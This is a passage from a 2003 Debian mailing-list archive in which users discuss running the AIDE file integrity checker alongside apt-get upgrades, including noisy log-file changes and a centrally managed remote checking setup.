D/QAn1sPOMTKi2WkPGblW1uJCci3BJF7
=u0sL
-END PGP SIGNATURE-

Re: aide, apt-get and remote management...

2003-12-11 Thread DI Peter Burgstaller 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi there,

I'm trying to use aide now as well .. but with the default debian 
config .. it produces
every day massive changes .. especially to the /var/log/* files due to 
logrotate.

Any reasonable settings that account for that?

Any advice would be greatly appreciated.
- - - Cheers, Peter
- - --
  Dipl.-Ing. Peter Burgstaller
  Technical Director
  @ all information network & services gmbh
  email: [EMAIL PROTECTED]
  phone: +43 662 452335
  fax  : +43 662 452335 90 -BEGIN PGP 
SIGNATURE-
Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAj/YWCQACgkQezyUhHKdNXRreACeMK9Pt4LIxnKmd8I1GhtaHIT2
vQoAn0YJHamV0D4wJAu0ChFZ6RFijHNe
=6MVw
- -END PGP SIGNATURE-
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (Darwin)
iEYEARECAAYFAj/YWJwACgkQezyUhHKdNXQNxgCbBbDuNdmzHxcKlJvmKL8kAnwK
D/QAn1sPOMTKi2WkPGblW1uJCci3BJF7
=u0sL
-END PGP SIGNATURE-
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: aide, apt-get and remote management...

2003-12-10 Thread Peter Solodov 
On 10 Dec 2003, Douglas F. Calvert wrote:
> With all the recent discussions about debsigs and file integrity I
> have been trying to figure out the best way to deal with apt-get
> uprgades on remote machines with aide running. Does anyone have a
> good system for the management of the aide database and system
> upgrades? Or just any good aide tips would be nice as well.

Here's how I do that.  I have a tightly secured well-protected
machine.  It holds file integrity databases.  Every night it runs AIDE
on a bunch of remote machines (AIDE binary is uploaded, then
signatures are collected and output is shipped back to the secure
machine).  AIDE reports are generated on the machine that initiated
the check.  Nothing on a remote machine indicates signatures are
collected.

That's the file integrity part.  As for upgrades and updates, I never
install anything automatically, but I have a cron job which checks if
updates are available.  And if there are, I would log on to a machine
and install new packages myself.

    - Peter

-- 
Peter Solodov| Concordia University 
http://alcor.concordia.ca/~peter | Montreal, QC, Canada

  1   2   3   4   5   6   7   >